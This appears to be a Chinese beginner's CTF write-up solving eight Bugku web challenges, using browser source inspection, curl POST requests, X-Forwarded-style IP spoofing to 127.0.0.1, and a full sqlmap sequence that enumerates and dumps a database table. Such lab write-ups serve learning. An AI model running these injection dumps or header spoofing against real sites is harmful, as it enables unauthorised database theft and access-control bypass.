今年十八,喜欢ctf-web

简介: 今年十八,喜欢ctf-web

前言


🍀作者简介:被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS、不喜欢java的不知名学生。


🫒每日emo:等我把脸皮磨厚


我今天就说几个超级简单的web题目,题目来自bugku


1、滑稽


想想最简单的web题目是啥


F12直接出flag

刚进来就是铺天盖地的滑稽


直接F12,

flag轻松获取


2、计算器


进来之后是个这玩意,56+26


有点难为人了,我直接通过计算器得知等于82


往里输呗

一输,发现不对劲,只能输入一个啊,那问题一定出在前端,看看源代码

maxlength(最大长度)='1'


直接改成2

输完点验证

看到这是不是觉着web挺简单的了,别急,难的在后边


知道get/post吧


3、GET


进来之后,发现是这么个玩意,简单的php代码


通过get方式读取数据存储到what变量里,然后输出


如果what==flag,输出flag


get请求最大的特点就是喜欢把乱七八糟的东西放到链接里,那我直接反客为主

成功获得flag


4、POST


post就不像get那么简单啦。


但是有简便方法,我不讲正常方法了。


正常就是通过post传递一个what=flag的参数进去,可以通过hackbar来实现

简便方法


winR cmd


curl -d what=flag + 链接


以下仅做了解

参数 描述
-I/--head 只显示传输文档,经常用于测试连接本身
-o/--output 把输出写到该文件中,必须输入保存文件名
-O/--remote-name 把输出写到该文件中,保留远程文件的文件名
-F/--form 模拟表单提交
-s/--silent 静默模式,不输出任何东西
-S/--show-error 显示错误,在选项 -s 中,当 curl 出现错误时将显示
-L/--location 跟踪重定向
-f/--fail 不输出错误
-n/--netrc 从netrc文件中读取用户名和密码
--netrc-optional 使用 .netrc 或者 URL来覆盖-n
--ntlm 使用 HTTP NTLM 身份验证
-N/--no-buffer 禁用缓冲输出
-p/--proxytunnel 使用HTTP代理
--proxy-anyauth 选择任一代理身份验证方法
--proxy-basic 在代理上使用基本身份验证
--proxy-digest 在代理上使用数字身份验证
--proxy-ntlm 在代理上使用ntlm身份验证
-P/--ftp-port 使用端口地址,而不是使用PASV
-M/--manual 显示全手动
-Q/--quote 文件传输前,发送命令到服务器
-r/--range 检索来自HTTP/1.1或FTP服务器字节范围
--range-file 读取(SSL)的随机文件
-R/--remote-time 在本地生成文件时,保留远程文件时间
--retry 传输出现问题时,重试的次数
--retry-delay 传输出现问题时,设置重试间隔时间
--retry-max-time 传输出现问题时,设置最大重试时间
--socks4 用socks4代理给定主机和端口
--socks5 用socks5代理给定主机和端口
-t/--telnet-option Telnet选项设置
--trace 对指定文件进行debug
--trace-ascii Like 跟踪但没有hex输出
--trace-time 跟踪/ 详细输出时,添加时间戳
-T/--upload-file 上传文件
-u/--user 设置服务器的用户和密码
-U/--proxy-user 设置代理用户名和密码
-V/--version 显示版本信息
-w/--write-out [format] 什么输出完成后
-x/--proxy 在给定的端口上使用HTTP代理
-X/--request 指定什么命令
-y/--speed-time 放弃限速所要的时间。默认为30
-Y/--speed-limit 停止传输速度的限制,速度时间'秒
-z/--time-cond 传送时间设置
-0/--http1.0 使用HTTP 1.0
-1/--tlsv1 使用TLSv1(SSL)
-2/--sslv2 使用SSLv2的(SSL)
-3/--sslv3 使用的SSLv3(SSL)
--3p-quote like -Q for the source URL for 3rd party transfer
--3p-url 使用url,进行第三方传送
--3p-user 使用用户名和密码,进行第三方传送
-4/--ipv4 使用IP4
-6/--ipv6 使用IP6
-#/--progress-bar 用进度条显示当前的传送状态


5、你必须让它停下


简单描述一下,这是个不断刷新的网页,只有当图片成功刷出来的时候我们才有机会获得flag


ctrl u直接看源代码,优点是这里不会一直刷新

直接F5刷新,省心省力


当图片为10.jpg的时候,后面成功显示flag


6、头等舱


进来之后啥也没有,源代码也是


头等舱。。。


多少沾点。。不是,


多少和头文件有点关系



7、本地管理员



先F12

base64去网站解一下

啥也别说了,这是密码。


账号是啥?


管理员系统,还能有啥


admin呗


进去之后被封IP了


再思考一下。。。


本地管理员。。


本地。


打开软件

在头文件里把IP地址改为本地127.0.0.1/localhost


8、成绩查询


进来,第一眼,sql注入!


找raw

把raw里的东西存在一个文件里,我命名为1.txt然后sqlmap跑

sqlmap.py -r 1.txt -p id current-db


-r – > 加载一个文件


-p – > 指定参数


-– current-db – > 获取当前数据库名称

爆出数据库名叫skctf


接着爆表


sqlmap.py -r 1.txt -p id -D skctf --tables

-D我个人觉着就是database的意思哈,方便记忆。


--tables就是爆表

爆出来有个叫fl4g的,差不多flag就在里面了


接着爆字段

sqlmap.py -r 1.txt -p id -D skctf -T fl4g --columns

-T就是tables


columns是字段

接下来爆字段里的内容

sqlmap.py -r 1.txt -p id -D skctf -T fl4g -C skctf_flag --dump

成功爆出flag

目录
相关文章
|
JavaScript
element-plus 按需引入将英文组件修改为中文
element-plus 按需引入将英文组件修改为中文
element-plus 按需引入将英文组件修改为中文
|
网络协议 Linux 数据库
|
8月前
|
前端开发 搜索推荐 数据安全/隐私保护
Calibre-Web-Automated:打造你的私人图书馆
Calibre-Web-Automated 是一个功能强大、易于使用的电子书管理平台,它可以帮助你轻松构建和管理你的私人图书馆。如果你正在寻找一个开源、免费、可定制的电子书管理解决方案,那么 Calibre-Web-Automated 绝对是你的不二之选!
481 10
Calibre-Web-Automated:打造你的私人图书馆
|
9月前
|
存储 算法 API
【01】整体试验思路,如何在有UID的情况下获得用户手机号信息,python开发之理论研究试验,如何通过抖音视频下方的用户的UID获得抖音用户的手机号-本系列文章仅供学习研究-禁止用于任何商业用途-仅供学习交流-优雅草卓伊凡
【01】整体试验思路,如何在有UID的情况下获得用户手机号信息,python开发之理论研究试验,如何通过抖音视频下方的用户的UID获得抖音用户的手机号-本系列文章仅供学习研究-禁止用于任何商业用途-仅供学习交流-优雅草卓伊凡
1420 82
|
机器学习/深度学习
总结机器学习中7种离散特征编码方式优缺点
整理总结对比了7种机器学习离散特征编码方式的优缺点
435 0
|
前端开发 网络协议 物联网
Django Web:搭建Websocket服务器(入门篇)
Django Web:搭建Websocket服务器(入门篇)
1689 1
|
监控 开发者 Python
【Python】已解决:WARNING: This is a development server. Do not use it in a production deployment. Use a p
【Python】已解决:WARNING: This is a development server. Do not use it in a production deployment. Use a p
1934 0
RZ
|
存储 缓存 弹性计算
张弛有道,块存储极致的创盘弹性能力
前言“鸿蒙初判陶镕铁,大禹神人亲所设。湖海江河浅共深,曾将此棒知之切。开山治水太平时,流落东洋镇海阙。日久年深放彩霞,能消能长能光洁。老孙有分取将来,变化无方随口诀。要大弥于宇宙间,要小却似针儿节。棒名如意号金箍,天上人间称一绝。重该一万三千五百斤,或粗或细能生灭。也曾助我闹天宫,也曾随我攻地阙。伏虎降龙处处通,炼魔荡怪方方彻。举头一指太阳昏,天地鬼神皆胆怯。混沌仙传到至今,原来不是凡间铁。”  
RZ
1000 1
|
SQL 数据库
[第一章 web入门]SQL注入-1 题目分析与详解
[第一章 web入门]SQL注入-1 题目分析与详解
|
应用服务中间件 nginx Docker
【Docker】搭建私有镜像仓库(带有图形化界面版本)
【Docker】搭建私有镜像仓库(带有图形化界面版本)
1067 0